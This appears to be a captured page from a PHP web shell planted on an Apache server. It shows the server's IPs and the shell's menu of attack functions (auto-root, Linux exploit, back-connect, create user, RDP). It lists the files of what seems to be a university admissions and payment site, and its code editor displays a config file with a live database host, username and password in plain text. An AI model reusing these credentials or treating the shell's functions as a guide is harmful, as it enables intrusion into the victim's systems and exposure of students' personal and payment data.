Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.116.88.132
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
misc /
public_html /
cuget16 /
[ HOME SHELL ]
Name
Size
Permission
Action
admission
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
instructions
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
phpmailer
[ DIR ]
drwxr-xr-x
prospectus
[ DIR ]
drwxr-xr-x
provisional
[ DIR ]
drwxr-xr-x
reg_soon_files
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
syllabus
[ DIR ]
drwxr-xr-x
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tmpphotos
[ DIR ]
drwxrwxrwx
PayUMoney Technical Integratio...
667.79
KB
-rwxr-xr-x
admapprove.php
1.23
KB
-rwxr-xr-x
admissionmamscthird.php
2.81
KB
-rwxr-xr-x
admissionmphd.php
2.26
KB
-rwxr-xr-x
admissionmphdsecond.php
2.36
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.13
KB
-rwxr-xr-x
cconfig_old.php
1.13
KB
-rwxr-xr-x
docdownload.php
3.46
KB
-rwxr-xr-x
docdownload_files.php
1.34
KB
-rwxr-xr-x
enable_app_status.php
3.68
KB
-rwxr-xr-x
enable_payment.php
3.34
KB
-rwxr-xr-x
enrollment.php
3.27
KB
-rwxr-xr-x
enrollpay_gateway.php
7.75
KB
-rwxr-xr-x
enrollpay_responce.php
9.05
KB
-rwxr-xr-x
enrollpay_responce07072016.php
7.75
KB
-rwxr-xr-x
hall_ticket.php
1.91
KB
-rwxr-xr-x
home.php
3.16
KB
-rwxr-xr-x
index.php
15.05
KB
-rwxr-xr-x
index12082016.php
14.77
KB
-rwxr-xr-x
instructions.html
2.76
KB
-rwxr-xr-x
instructions.php
1.62
KB
-rwxr-xr-x
login.php
4.75
KB
-rwxr-xr-x
make_payment.php
2.7
KB
-rwxr-xr-x
mission_pros.pdf
32.37
KB
-rwxr-xr-x
payment_gate_way_responce01062...
7
KB
-rwxr-xr-x
payment_gateway01062016.php
7.64
KB
-rwxr-xr-x
photo.rar
32.2
MB
-rwxr-xr-x
photodownload.html
4.75
KB
-rwxr-xr-x
print_app_form.php
3.5
KB
-rwxr-xr-x
print_challan01062016.php
3.54
KB
-rwxr-xr-x
prospectus.php
3.91
KB
-rwxr-xr-x
provisional.php
1.21
KB
-rwxr-xr-x
provisionalM2.php
1.19
KB
-rwxr-xr-x
provisionalmph.php
1.2
KB
-rwxr-xr-x
provisionalmphM1.php
1.2
KB
-rwxr-xr-x
provisionalmphM2.php
1.2
KB
-rwxr-xr-x
registration01062016.php
699
B
-rwxr-xr-x
send_email_sms.php
19.44
KB
-rwxr-xr-x
send_email_sms_16062016.php
2.25
KB
-rwxr-xr-x
sign.rar
18.4
MB
-rwxr-xr-x
syllabus.php
1.17
KB
-rwxr-xr-x
update_challan.php
2.76
KB
-rwxr-xr-x
vpc_php_serverhost_do.php
6.69
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cconfig.php
<?php define("APP_LANDPAGE_G","app.php"); define("APP_PATH_G", dirname($_SERVER["SCRIPT_FILENAME"])); define("APP_SRC_G", APP_PATH_G . "/src"); define("APP_LIB_G", APP_PATH_G . "/libs"); define("APP_DB_G", APP_LIB_G . "/adodb5"); class CConfig { public $mstr_host; public $mstr_user; public $mstr_password; public $mstr_db; public $mbool_debug; function __construct($abool_debug = false) { $this->mstr_host = "72.167.46.92"; $this->mstr_user = "cugetuser"; $this->mstr_password = "Logisys@2106"; $this->mstr_db = "cuget_2016"; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); } static function GetSystemDate($aobj_context) { $get_date="select date_add(date_add(now(),INTERVAL 13 hour),interval 30 minute) as now_date"; $obj=$aobj_context->mobj_db->GetRow($get_date); return $obj[now_date]; } static function CreateNewDbContext() { require_once("src/customappcontext.php"); $live_aobj_context=new LiveContext(); $live_aobj_context->Initialize(); $live_aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); return $live_aobj_context; } } ?>
Close